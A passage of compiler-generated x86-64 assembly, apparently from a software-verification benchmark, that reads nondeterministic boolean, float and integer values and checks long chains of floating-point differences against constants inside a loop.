callq ___VERIFIER_nondet_bool
movl %eax, -24(%rbp)
callq ___VERIFIER_nondet_float
movss %xmm0, -32(%rbp)
callq ___VERIFIER_nondet_float
movss %xmm0, -40(%rbp)
callq ___VERIFIER_nondet_float
movss %xmm0, -48(%rbp)
callq ___VERIFIER_nondet_float
movss %xmm0, -56(%rbp)
callq ___VERIFIER_nondet_float
movss %xmm0, -64(%rbp)
callq ___VERIFIER_nondet_float
movss %xmm0, -72(%rbp)
callq ___VERIFIER_nondet_bool
movl %eax, -80(%rbp)
callq ___VERIFIER_nondet_float
movss %xmm0, -88(%rbp)
callq ___VERIFIER_nondet_float
movss %xmm0, -96(%rbp)
callq ___VERIFIER_nondet_float
movss %xmm0, -104(%rbp)
callq ___VERIFIER_nondet_float
movss %xmm0, -112(%rbp)
callq ___VERIFIER_nondet_float
movss %xmm0, -120(%rbp)
callq ___VERIFIER_nondet_float
movss %xmm0, -128(%rbp)
callq ___VERIFIER_nondet_float
movss %xmm0, -136(%rbp)
callq ___VERIFIER_nondet_float
movss %xmm0, -144(%rbp)
callq ___VERIFIER_nondet_float
movss %xmm0, -152(%rbp)
callq ___VERIFIER_nondet_float
movss %xmm0, -160(%rbp)
callq ___VERIFIER_nondet_float
movss %xmm0, -168(%rbp)
callq ___VERIFIER_nondet_float
movss %xmm0, -176(%rbp)
callq ___VERIFIER_nondet_float
movss %xmm0, -184(%rbp)
callq ___VERIFIER_nondet_float
movss %xmm0, -192(%rbp)
movss -56(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm1
movss -32(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
subsd %xmm0, %xmm1
movsd LCPI1_0(%rip), %xmm0 ## xmm0 = mem[0],zero
ucomisd %xmm1, %xmm0
jae LBB1_5
## %bb.1:
xorl %eax, %eax
## kill: def $al killed $al killed $eax
cmpl $0, -80(%rbp)
movb %al, -205(%rbp) ## 1-byte Spill
je LBB1_7
## %bb.2:
movss -72(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
movss -64(%rbp), %xmm1 ## xmm1 = mem[0],zero,zero,zero
cvtss2sd %xmm1, %xmm1
subsd %xmm1, %xmm0
movsd LCPI1_1(%rip), %xmm1 ## xmm1 = mem[0],zero
ucomisd %xmm1, %xmm0
jae LBB1_5
## %bb.3:
movss -56(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm1
movss -32(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
subsd %xmm0, %xmm1
xorl %eax, %eax
## kill: def $al killed $al killed $eax
movsd LCPI1_0(%rip), %xmm0 ## xmm0 = mem[0],zero
ucomisd %xmm1, %xmm0
movb %al, -205(%rbp) ## 1-byte Spill
jb LBB1_7
## %bb.4:
xorl %eax, %eax
## kill: def $al killed $al killed $eax
cmpl $0, -24(%rbp)
movb %al, -205(%rbp) ## 1-byte Spill
je LBB1_7
LBB1_5:
xorl %eax, %eax
## kill: def $al killed $al killed $eax
cmpl $0, -16(%rbp)
movb %al, -205(%rbp) ## 1-byte Spill
jne LBB1_7
## %bb.6:
cmpl $0, -8(%rbp)
setne %al
xorb $-1, %al
movb %al, -205(%rbp) ## 1-byte Spill
LBB1_7:
movb -205(%rbp), %al ## 1-byte Reload
andb $1, %al
movzbl %al, %eax
movl %eax, -204(%rbp)
LBB1_8: ## =>This Inner Loop Header: Depth=1
xorl %eax, %eax
## kill: def $al killed $al killed $eax
cmpl $0, -200(%rbp)
movb %al, -206(%rbp) ## 1-byte Spill
jl LBB1_10
## %bb.9: ## in Loop: Header=BB1_8 Depth=1
cmpl $0, -204(%rbp)
setne %al
movb %al, -206(%rbp) ## 1-byte Spill
LBB1_10: ## in Loop: Header=BB1_8 Depth=1
movb -206(%rbp), %al ## 1-byte Reload
testb $1, %al
jne LBB1_11
jmp LBB1_455
LBB1_11: ## in Loop: Header=BB1_8 Depth=1
cmpl $0, -16(%rbp)
je LBB1_14
## %bb.12: ## in Loop: Header=BB1_8 Depth=1
cmpl $0, -8(%rbp)
je LBB1_14
## %bb.13: ## in Loop: Header=BB1_8 Depth=1
callq ___VERIFIER_nondet_int
movl %eax, -200(%rbp)
jmp LBB1_15
LBB1_14: ## in Loop: Header=BB1_8 Depth=1
movl -200(%rbp), %eax
addl $-1, %eax
movl %eax, -200(%rbp)
LBB1_15: ## in Loop: Header=BB1_8 Depth=1
callq ___VERIFIER_nondet_bool
movl %eax, -12(%rbp)
callq ___VERIFIER_nondet_bool
movl %eax, -20(%rbp)
callq ___VERIFIER_nondet_bool
movl %eax, -28(%rbp)
callq ___VERIFIER_nondet_float
movss %xmm0, -36(%rbp)
callq ___VERIFIER_nondet_float
movss %xmm0, -44(%rbp)
callq ___VERIFIER_nondet_float
movss %xmm0, -52(%rbp)
callq ___VERIFIER_nondet_float
movss %xmm0, -60(%rbp)
callq ___VERIFIER_nondet_float
movss %xmm0, -68(%rbp)
callq ___VERIFIER_nondet_float
movss %xmm0, -76(%rbp)
callq ___VERIFIER_nondet_bool
movl %eax, -84(%rbp)
callq ___VERIFIER_nondet_float
movss %xmm0, -92(%rbp)
callq ___VERIFIER_nondet_float
movss %xmm0, -100(%rbp)
callq ___VERIFIER_nondet_float
movss %xmm0, -108(%rbp)
callq ___VERIFIER_nondet_float
movss %xmm0, -116(%rbp)
callq ___VERIFIER_nondet_float
movss %xmm0, -124(%rbp)
callq ___VERIFIER_nondet_float
movss %xmm0, -132(%rbp)
callq ___VERIFIER_nondet_float
movss %xmm0, -140(%rbp)
callq ___VERIFIER_nondet_float
movss %xmm0, -148(%rbp)
callq ___VERIFIER_nondet_float
movss %xmm0, -156(%rbp)
callq ___VERIFIER_nondet_float
movss %xmm0, -164(%rbp)
callq ___VERIFIER_nondet_float
movss %xmm0, -172(%rbp)
callq ___VERIFIER_nondet_float
movss %xmm0, -180(%rbp)
callq ___VERIFIER_nondet_float
movss %xmm0, -188(%rbp)
callq ___VERIFIER_nondet_float
movss %xmm0, -196(%rbp)
movss -184(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm1
movss -100(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
subsd %xmm0, %xmm1
xorl %eax, %eax
## kill: def $al killed $al killed $eax
movsd LCPI1_2(%rip), %xmm0 ## xmm0 = mem[0],zero
ucomisd %xmm1, %xmm0
movb %al, -207(%rbp) ## 1-byte Spill
jb LBB1_454
## %bb.16: ## in Loop: Header=BB1_8 Depth=1
movss -64(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm1
movss -100(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
subsd %xmm0, %xmm1
xorl %eax, %eax
## kill: def $al killed $al killed $eax
movsd LCPI1_0(%rip), %xmm0 ## xmm0 = mem[0],zero
ucomisd %xmm1, %xmm0
movb %al, -207(%rbp) ## 1-byte Spill
jb LBB1_454
## %bb.17: ## in Loop: Header=BB1_8 Depth=1
movss -168(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm1
movss -100(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
subsd %xmm0, %xmm1
xorl %eax, %eax
## kill: def $al killed $al killed $eax
movsd LCPI1_3(%rip), %xmm0 ## xmm0 = mem[0],zero
ucomisd %xmm1, %xmm0
movb %al, -207(%rbp) ## 1-byte Spill
jb LBB1_454
## %bb.18: ## in Loop: Header=BB1_8 Depth=1
movss -152(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm1
movss -100(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
subsd %xmm0, %xmm1
xorl %eax, %eax
## kill: def $al killed $al killed $eax
movsd LCPI1_1(%rip), %xmm0 ## xmm0 = mem[0],zero
ucomisd %xmm1, %xmm0
movb %al, -207(%rbp) ## 1-byte Spill
jb LBB1_454
## %bb.19: ## in Loop: Header=BB1_8 Depth=1
movss -160(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm1
movss -100(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
subsd %xmm0, %xmm1
xorl %eax, %eax
## kill: def $al killed $al killed $eax
movsd LCPI1_4(%rip), %xmm0 ## xmm0 = mem[0],zero
ucomisd %xmm1, %xmm0
movb %al, -207(%rbp) ## 1-byte Spill
jb LBB1_454
## %bb.20: ## in Loop: Header=BB1_8 Depth=1
movss -128(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm1
movss -100(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
subsd %xmm0, %xmm1
xorl %eax, %eax
## kill: def $al killed $al killed $eax
movsd LCPI1_5(%rip), %xmm0 ## xmm0 = mem[0],zero
ucomisd %xmm1, %xmm0
movb %al, -207(%rbp) ## 1-byte Spill
jb LBB1_454
## %bb.21: ## in Loop: Header=BB1_8 Depth=1
movss -120(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm1
movss -100(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
subsd %xmm0, %xmm1
xorl %eax, %eax
## kill: def $al killed $al killed $eax
movsd LCPI1_6(%rip), %xmm0 ## xmm0 = mem[0],zero
ucomisd %xmm1, %xmm0
movb %al, -207(%rbp) ## 1-byte Spill
jb LBB1_454
## %bb.22: ## in Loop: Header=BB1_8 Depth=1
movss -192(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm1
movss -100(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
subsd %xmm0, %xmm1
xorl %eax, %eax
## kill: def $al killed $al killed $eax
movsd LCPI1_7(%rip), %xmm0 ## xmm0 = mem[0],zero
ucomisd %xmm1, %xmm0
movb %al, -207(%rbp) ## 1-byte Spill
jb LBB1_454
## %bb.23: ## in Loop: Header=BB1_8 Depth=1
movss -104(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm1
movss -100(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
subsd %xmm0, %xmm1
xorl %eax, %eax
## kill: def $al killed $al killed $eax
movsd LCPI1_8(%rip), %xmm0 ## xmm0 = mem[0],zero
ucomisd %xmm1, %xmm0
movb %al, -207(%rbp) ## 1-byte Spill
jb LBB1_454
## %bb.24: ## in Loop: Header=BB1_8 Depth=1
movss -88(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm1
movss -100(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
subsd %xmm0, %xmm1
xorl %eax, %eax
## kill: def $al killed $al killed $eax
movsd LCPI1_9(%rip), %xmm0 ## xmm0 = mem[0],zero
ucomisd %xmm1, %xmm0
movb %al, -207(%rbp) ## 1-byte Spill
jb LBB1_454
## %bb.25: ## in Loop: Header=BB1_8 Depth=1
movss -184(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
movss -100(%rbp), %xmm1 ## xmm1 = mem[0],zero,zero,zero
cvtss2sd %xmm1, %xmm1
subsd %xmm1, %xmm0
movsd LCPI1_2(%rip), %xmm1 ## xmm1 = mem[0],zero
ucomisd %xmm1, %xmm0
jne LBB1_26
jp LBB1_26
jmp LBB1_35
LBB1_26: ## in Loop: Header=BB1_8 Depth=1
movss -64(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
movss -100(%rbp), %xmm1 ## xmm1 = mem[0],zero,zero,zero
cvtss2sd %xmm1, %xmm1
subsd %xmm1, %xmm0
movsd LCPI1_0(%rip), %xmm1 ## xmm1 = mem[0],zero
ucomisd %xmm1, %xmm0
jne LBB1_27
jp LBB1_27
jmp LBB1_35
LBB1_27: ## in Loop: Header=BB1_8 Depth=1
movss -168(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
movss -100(%rbp), %xmm1 ## xmm1 = mem[0],zero,zero,zero
cvtss2sd %xmm1, %xmm1
subsd %xmm1, %xmm0
movsd LCPI1_3(%rip), %xmm1 ## xmm1 = mem[0],zero
ucomisd %xmm1, %xmm0
jne LBB1_28
jp LBB1_28
jmp LBB1_35
LBB1_28: ## in Loop: Header=BB1_8 Depth=1
movss -152(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
movss -100(%rbp), %xmm1 ## xmm1 = mem[0],zero,zero,zero
cvtss2sd %xmm1, %xmm1
subsd %xmm1, %xmm0
movsd LCPI1_1(%rip), %xmm1 ## xmm1 = mem[0],zero
ucomisd %xmm1, %xmm0
jne LBB1_29
jp LBB1_29
jmp LBB1_35
LBB1_29: ## in Loop: Header=BB1_8 Depth=1
movss -160(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
movss -100(%rbp), %xmm1 ## xmm1 = mem[0],zero,zero,zero
cvtss2sd %xmm1, %xmm1
subsd %xmm1, %xmm0
movsd LCPI1_4(%rip), %xmm1 ## xmm1 = mem[0],zero
ucomisd %xmm1, %xmm0
jne LBB1_30
jp LBB1_30
jmp LBB1_35
LBB1_30: ## in Loop: Header=BB1_8 Depth=1
movss -128(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
movss -100(%rbp), %xmm1 ## xmm1 = mem[0],zero,zero,zero
cvtss2sd %xmm1, %xmm1
subsd %xmm1, %xmm0
movsd LCPI1_5(%rip), %xmm1 ## xmm1 = mem[0],zero
ucomisd %xmm1, %xmm0
jne LBB1_31
jp LBB1_31
jmp LBB1_35
LBB1_31: ## in Loop: Header=BB1_8 Depth=1
movss -120(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
movss -100(%rbp), %xmm1 ## xmm1 = mem[0],zero,zero,zero
cvtss2sd %xmm1, %xmm1
subsd %xmm1, %xmm0
movsd LCPI1_6(%rip), %xmm1 ## xmm1 = mem[0],zero
ucomisd %xmm1, %xmm0
jne LBB1_32
jp LBB1_32
jmp LBB1_35
LBB1_32: ## in Loop: Header=BB1_8 Depth=1
movss -192(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
movss -100(%rbp), %xmm1 ## xmm1 = mem[0],zero,zero,zero
cvtss2sd %xmm1, %xmm1
subsd %xmm1, %xmm0
movsd LCPI1_7(%rip), %xmm1 ## xmm1 = mem[0],zero
ucomisd %xmm1, %xmm0
jne LBB1_33
jp LBB1_33
jmp LBB1_35
LBB1_33: ## in Loop: Header=BB1_8 Depth=1
movss -104(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
movss -100(%rbp), %xmm1 ## xmm1 = mem[0],zero,zero,zero
cvtss2sd %xmm1, %xmm1
subsd %xmm1, %xmm0
movsd LCPI1_8(%rip), %xmm1 ## xmm1 = mem[0],zero
ucomisd %xmm1, %xmm0
jne LBB1_34
jp LBB1_34
jmp LBB1_35
LBB1_34: ## in Loop: Header=BB1_8 Depth=1
movss -88(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
movss -100(%rbp), %xmm1 ## xmm1 = mem[0],zero,zero,zero
cvtss2sd %xmm1, %xmm1
subsd %xmm1, %xmm0
xorl %eax, %eax
## kill: def $al killed $al killed $eax
movsd LCPI1_9(%rip), %xmm1 ## xmm1 = mem[0],zero
ucomisd %xmm1, %xmm0
movb %al, -207(%rbp) ## 1-byte Spill
jne LBB1_454
jp LBB1_454
LBB1_35: ## in Loop: Header=BB1_8 Depth=1
movss -176(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm1
movss -108(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
subsd %xmm0, %xmm1
xorl %eax, %eax
## kill: def $al killed $al killed $eax
movsd LCPI1_10(%rip), %xmm0 ## xmm0 = mem[0],zero
ucomisd %xmm1, %xmm0
movb %al, -207(%rbp) ## 1-byte Spill
jb LBB1_454
## %bb.36: ## in Loop: Header=BB1_8 Depth=1
movss -40(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm1
movss -108(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
subsd %xmm0, %xmm1
xorl %eax, %eax
## kill: def $al killed $al killed $eax
movsd LCPI1_4(%rip), %xmm0 ## xmm0 = mem[0],zero
ucomisd %xmm1, %xmm0
movb %al, -207(%rbp) ## 1-byte Spill
jb LBB1_454
## %bb.37: ## in Loop: Header=BB1_8 Depth=1
movss -32(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm1
movss -108(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
subsd %xmm0, %xmm1
xorl %eax, %eax
## kill: def $al killed $al killed $eax
movsd LCPI1_1(%rip), %xmm0 ## xmm0 = mem[0],zero
ucomisd %xmm1, %xmm0
movb %al, -207(%rbp) ## 1-byte Spill
jb LBB1_454
## %bb.38: ## in Loop: Header=BB1_8 Depth=1
movss -112(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm1
movss -108(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
subsd %xmm0, %xmm1
xorl %eax, %eax
## kill: def $al killed $al killed $eax
movsd LCPI1_11(%rip), %xmm0 ## xmm0 = mem[0],zero
ucomisd %xmm1, %xmm0
movb %al, -207(%rbp) ## 1-byte Spill
jb LBB1_454
## %bb.39: ## in Loop: Header=BB1_8 Depth=1
movss -56(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm1
movss -108(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
subsd %xmm0, %xmm1
xorl %eax, %eax
## kill: def $al killed $al killed $eax
movsd LCPI1_8(%rip), %xmm0 ## xmm0 = mem[0],zero
ucomisd %xmm1, %xmm0
movb %al, -207(%rbp) ## 1-byte Spill
jb LBB1_454
## %bb.40: ## in Loop: Header=BB1_8 Depth=1
movss -128(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm1
movss -108(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
subsd %xmm0, %xmm1
xorl %eax, %eax
## kill: def $al killed $al killed $eax
movsd LCPI1_12(%rip), %xmm0 ## xmm0 = mem[0],zero
ucomisd %xmm1, %xmm0
movb %al, -207(%rbp) ## 1-byte Spill
jb LBB1_454
## %bb.41: ## in Loop: Header=BB1_8 Depth=1
movss -136(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm1
movss -108(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
subsd %xmm0, %xmm1
xorl %eax, %eax
## kill: def $al killed $al killed $eax
movsd LCPI1_12(%rip), %xmm0 ## xmm0 = mem[0],zero
ucomisd %xmm1, %xmm0
movb %al, -207(%rbp) ## 1-byte Spill
jb LBB1_454
## %bb.42: ## in Loop: Header=BB1_8 Depth=1
movss -120(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm1
movss -108(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
subsd %xmm0, %xmm1
xorl %eax, %eax
## kill: def $al killed $al killed $eax
movsd LCPI1_0(%rip), %xmm0 ## xmm0 = mem[0],zero
ucomisd %xmm1, %xmm0
movb %al, -207(%rbp) ## 1-byte Spill
jb LBB1_454
## %bb.43: ## in Loop: Header=BB1_8 Depth=1
movss -96(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm1
movss -108(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
subsd %xmm0, %xmm1
xorl %eax, %eax
## kill: def $al killed $al killed $eax
movsd LCPI1_7(%rip), %xmm0 ## xmm0 = mem[0],zero
ucomisd %xmm1, %xmm0
movb %al, -207(%rbp) ## 1-byte Spill
jb LBB1_454
## %bb.44: ## in Loop: Header=BB1_8 Depth=1
movss -104(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm1
movss -108(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
subsd %xmm0, %xmm1
xorl %eax, %eax
## kill: def $al killed $al killed $eax
movsd LCPI1_3(%rip), %xmm0 ## xmm0 = mem[0],zero
ucomisd %xmm1, %xmm0
movb %al, -207(%rbp) ## 1-byte Spill
jb LBB1_454
## %bb.45: ## in Loop: Header=BB1_8 Depth=1
movss -176(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
movss -108(%rbp), %xmm1 ## xmm1 = mem[0],zero,zero,zero
cvtss2sd %xmm1, %xmm1
subsd %xmm1, %xmm0
movsd LCPI1_10(%rip), %xmm1 ## xmm1 = mem[0],zero
ucomisd %xmm1, %xmm0
jne LBB1_46
jp LBB1_46
jmp LBB1_55
LBB1_46: ## in Loop: Header=BB1_8 Depth=1
movss -40(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
movss -108(%rbp), %xmm1 ## xmm1 = mem[0],zero,zero,zero
cvtss2sd %xmm1, %xmm1
subsd %xmm1, %xmm0
movsd LCPI1_4(%rip), %xmm1 ## xmm1 = mem[0],zero
ucomisd %xmm1, %xmm0
jne LBB1_47
jp LBB1_47
jmp LBB1_55
LBB1_47: ## in Loop: Header=BB1_8 Depth=1
movss -32(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
movss -108(%rbp), %xmm1 ## xmm1 = mem[0],zero,zero,zero
cvtss2sd %xmm1, %xmm1
subsd %xmm1, %xmm0
movsd LCPI1_1(%rip), %xmm1 ## xmm1 = mem[0],zero
ucomisd %xmm1, %xmm0
jne LBB1_48
jp LBB1_48
jmp LBB1_55
LBB1_48: ## in Loop: Header=BB1_8 Depth=1
movss -112(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
movss -108(%rbp), %xmm1 ## xmm1 = mem[0],zero,zero,zero
cvtss2sd %xmm1, %xmm1
subsd %xmm1, %xmm0
movsd LCPI1_11(%rip), %xmm1 ## xmm1 = mem[0],zero
ucomisd %xmm1, %xmm0
jne LBB1_49
jp LBB1_49
jmp LBB1_55
LBB1_49: ## in Loop: Header=BB1_8 Depth=1
movss -56(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
movss -108(%rbp), %xmm1 ## xmm1 = mem[0],zero,zero,zero
cvtss2sd %xmm1, %xmm1
subsd %xmm1, %xmm0
movsd LCPI1_8(%rip), %xmm1 ## xmm1 = mem[0],zero
ucomisd %xmm1, %xmm0
jne LBB1_50
jp LBB1_50
jmp LBB1_55
LBB1_50: ## in Loop: Header=BB1_8 Depth=1
movss -128(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
movss -108(%rbp), %xmm1 ## xmm1 = mem[0],zero,zero,zero
cvtss2sd %xmm1, %xmm1
subsd %xmm1, %xmm0
movsd LCPI1_12(%rip), %xmm1 ## xmm1 = mem[0],zero
ucomisd %xmm1, %xmm0
jne LBB1_51
jp LBB1_51
jmp LBB1_55
LBB1_51: ## in Loop: Header=BB1_8 Depth=1
movss -136(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
movss -108(%rbp), %xmm1 ## xmm1 = mem[0],zero,zero,zero
cvtss2sd %xmm1, %xmm1
subsd %xmm1, %xmm0
movsd LCPI1_12(%rip), %xmm1 ## xmm1 = mem[0],zero
ucomisd %xmm1, %xmm0
jne LBB1_52
jp LBB1_52
jmp LBB1_55
LBB1_52: ## in Loop: Header=BB1_8 Depth=1
movss -120(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
movss -108(%rbp), %xmm1 ## xmm1 = mem[0],zero,zero,zero
cvtss2sd %xmm1, %xmm1
subsd %xmm1, %xmm0
movsd LCPI1_0(%rip), %xmm1 ## xmm1 = mem[0],zero
ucomisd %xmm1, %xmm0
jne LBB1_53
jp LBB1_53
jmp LBB1_55
LBB1_53: ## in Loop: Header=BB1_8 Depth=1
movss -96(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
movss -108(%rbp), %xmm1 ## xmm1 = mem[0],zero,zero,zero
cvtss2sd %xmm1, %xmm1
subsd %xmm1, %xmm0
movsd LCPI1_7(%rip), %xmm1 ## xmm1 = mem[0],zero
ucomisd %xmm1, %xmm0
jne LBB1_54
jp LBB1_54
jmp LBB1_55
LBB1_54: ## in Loop: Header=BB1_8 Depth=1
movss -104(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
movss -108(%rbp), %xmm1 ## xmm1 = mem[0],zero,zero,zero
cvtss2sd %xmm1, %xmm1
subsd %xmm1, %xmm0
xorl %eax, %eax
## kill: def $al killed $al killed $eax
movsd LCPI1_3(%rip), %xmm1 ## xmm1 = mem[0],zero
ucomisd %xmm1, %xmm0
movb %al, -207(%rbp) ## 1-byte Spill
jne LBB1_454
jp LBB1_454
LBB1_55: ## in Loop: Header=BB1_8 Depth=1
movss -32(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm1
movss -92(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
subsd %xmm0, %xmm1
xorl %eax, %eax
## kill: def $al killed $al killed $eax
movsd LCPI1_10(%rip), %xmm0 ## xmm0 = mem[0],zero
ucomisd %xmm1, %xmm0
movb %al, -207(%rbp) ## 1-byte Spill
jb LBB1_454
## %bb.56: ## in Loop: Header=BB1_8 Depth=1
movss -64(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm1
movss -92(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
subsd %xmm0, %xmm1
xorl %eax, %eax
## kill: def $al killed $al killed $eax
movsd LCPI1_13(%rip), %xmm0 ## xmm0 = mem[0],zero
ucomisd %xmm1, %xmm0
movb %al, -207(%rbp) ## 1-byte Spill
jb LBB1_454
## %bb.57: ## in Loop: Header=BB1_8 Depth=1
movss -168(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm1
movss -92(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
subsd %xmm0, %xmm1
xorl %eax, %eax
## kill: def $al killed $al killed $eax
movsd LCPI1_14(%rip), %xmm0 ## xmm0 = mem[0],zero
ucomisd %xmm1, %xmm0
movb %al, -207(%rbp) ## 1-byte Spill
jb LBB1_454
## %bb.58: ## in Loop: Header=BB1_8 Depth=1
movss -56(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm1
movss -92(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
subsd %xmm0, %xmm1
xorl %eax, %eax
## kill: def $al killed $al killed $eax
movsd LCPI1_15(%rip), %xmm0 ## xmm0 = mem[0],zero
ucomisd %xmm1, %xmm0
movb %al, -207(%rbp) ## 1-byte Spill
jb LBB1_454
## %bb.59: ## in Loop: Header=BB1_8 Depth=1
movss -48(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm1
movss -92(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
subsd %xmm0, %xmm1
xorl %eax, %eax
## kill: def $al killed $al killed $eax
movsd LCPI1_3(%rip), %xmm0 ## xmm0 = mem[0],zero
ucomisd %xmm1, %xmm0
movb %al, -207(%rbp) ## 1-byte Spill
jb LBB1_454
## %bb.60: ## in Loop: Header=BB1_8 Depth=1
movss -128(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm1
movss -92(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
subsd %xmm0, %xmm1
xorl %eax, %eax
## kill: def $al killed $al killed $eax
